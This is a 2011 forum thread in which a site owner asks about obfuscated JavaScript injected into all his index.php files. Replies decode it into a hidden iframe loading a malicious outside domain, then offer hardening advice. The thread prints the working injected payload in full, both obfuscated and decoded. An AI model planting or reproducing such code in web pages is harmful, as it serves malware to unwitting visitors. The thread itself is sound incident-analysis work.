index.php hacked

@go-sevenAug 28.2011

hi guys,

my server was attaced some days ago, and to all “index.php” files the following code was added:

[CODE] <script>String.prototype.test=”harC”;for(i in $=”)m=$[i];var ss=””;try{eval(‘asdas’)}catch(q){s=String[“fr”+”omC”+m+”od”+’e’];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘a’+’s’))throw 1;}catch(q){h=-1*(d-d2);} n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval(“n”+”[“+”i”+”]”));eval(ss);</script> [/CODE]

Well. i think it’s java script, and now i want to know WHAT this code is / was doing a) at my server b) in the browser of my visitors

thanks!

ps: as you’ve might have realized, english is not my mother tongue ? …

to post a comment

JavaScript

14 Comments(s) _↴

@DracoMerestAug 28.2011 — #decoded:

if (document.getElementsByTagName('body')[0])
 { iframer(); }
 else
 { document.write("&amp;lt;iframe src='http://pouzvtnh.cz.cc/count16.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'&amp;gt;&amp;lt;/iframe&amp;gt;");
 }
 function iframer()
 { var f = document.createElement('iframe');
 f.setAttribute('src','http://pouzvtnh.cz.cc/count16.php');
 f.style.visibility='hidden';
 f.style.position='absolute';
 f.style.left='0';
 f.style.top='0';
 f.setAttribute('width','10');
 f.setAttribute('height','10');
 document.getElementsByTagName('body')[0].appendChild(f);
 }

edit: wow, Do Not load that pouzvth.cz.cc site. Will redirect you somewhere else

and even though I only downloaded the source in raw unexecutable text, AVG picked

it up. So it's a known threat.

@go-sevenauthorAug 28.2011 — #do you ahve an idea, how it came to my webspace? i'm only using linux systems - no windows!

@DracoMerestAug 28.2011 — #Best guess: someone figured out your linux password? I do not know how you access

your server remotely but obviously someone does.

Hacking is a tricky thing - sometimes the easiest method is the least obvious.

If you have a simple password and I can sniff out your password hash database (I don't

know what it is called really) and extracted the MD5 hash or which ever, I could either

brute force your password or use a rainbow table.

@go-sevenauthorAug 28.2011 — #okay, i've changed all my passwords now - hopfully i wount forget them... (by the way i used a live disk that could not be infected by a rootkit, i think).

i'm going to contact my hoster too. hopefully he might help me...

okay, thanks for your great help, now i know, whats my problem.

@DracoMerestAug 29.2011 — #Passwords may not have been your only problem area.

You have no indicated what is on your site.

If you allow visitors to post information through a shoutbox or mini forum then there is

always the possibility that someone was able to bypass any active content filters and

inject some malicious code which actively modified the files on your sever.

Having changed one security aspect: you password, wait. If it happens again look for a

solution elsewhere. Always make one change and test the result.

@DorkyAug 30.2011 — #all page data should come thrue the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;

the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.

after all, sql is simply a flatfile organizer.

@criterion9Aug 30.2011 — #all page data should come thrue the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;

the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.

after all, sql is simply a flatfile organizer.[/QUOTE]

SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.

@DorkyAug 30.2011 — #SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.[/QUOTE]

Word

@drotha2Oct 06.2011 — #Hi,

DracoMerest, you'd know where I could tell me decode this kind of code or that code is, that base64 is not a site where encode / decode or some script that allows me to do this kind of coding.

Sorry for my bad English

Thanks a lot.

@DracoMerestOct 06.2011 — #Hi Drotha,

Your English is not that bad but your description of what you want is terrible.

The only thing I can really identify from your request is base64 and de/encode.

Do you have MIME64 text you wish to decode?

http://www.webutils.pl/Base64

This type of text is usually found as a BIN attachment for newsgroups.

Are you referring to MD5 or NT/LM hashcodes?

RunScanner is very good.

RaibowTables.com will get many jobs done.

That is all I can offer at the moment due to not fully understanding your question.

@dalecospOct 06.2011 — #Most of these attacks (in the wild) are SQL-injections. Always sanitize your inputs. If you're running someone else's code, upgrade to the latest version. And complain to them rather loudly ?

@drotha2Oct 06.2011 — #Hi DracoMerest,

I wish I could de/encode this type of code

7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,... in the first post you put and him decode, not is base64 coded or no I decoded

as de/encode?

Thanks a lot

@DracoMerestOct 08.2011 — #Hi Dortha,

I do not have an encoder.

The decoder is in the script posted by go-seven. I merely asked the decoder

to show the result instead of executing it.

for(i=0;i<n.length;i++)

ss+=s(eval("n"+"["+"i"+"]"));

// eval(ss);

document.write("<xmp>"+ss+"</xmp>");

Search Google for 'encrypt JavaScript' and you'll find many results. but most

of them are useless because the decode script must be included within any

webpage that uses the encryption.

Did you read the Sticky Note "Wondering how to hide your source code?"

Note: I am very sad to see the <XMP> tag not being part of HTML5...

@TSNetJan 22.2013 — #Passwords may not have been your only problem area.

You have no indicated what is on your site.

If you allow visitors to post information through a shoutbox or mini forum then there is

always the possibility that someone was able to bypass any active content filters and

inject some malicious code which actively modified the files on your sever.

Having changed one security aspect: you password, wait. If it happens again look for a

solution elsewhere. Always make one change and test the result.[/QUOTE]

I was planning to add a shoutbox to my site, and seeing this post, im now pondering if it is safe to add the shoutbox.

Also in #JavaScript _↴

XMLHttpRequest.responseText Is Empty Despite readystate=4 Half my JavaScript Missing Odd mouseovers

Success!

Help @go-seven spread the word by sharing this article on Twitter...

Tweet This

index.php hacked

14 Comments(s) _↴

Also in #JavaScript _↴

Success!

Social

Version

index.php hacked

14 Comments(s) ↴

Also in #JavaScript ↴

Success!

The web is an endless sea of information. Don't miss the boat... Subscribe!

Social

Version

14 Comments(s) _↴

Also in #JavaScript _↴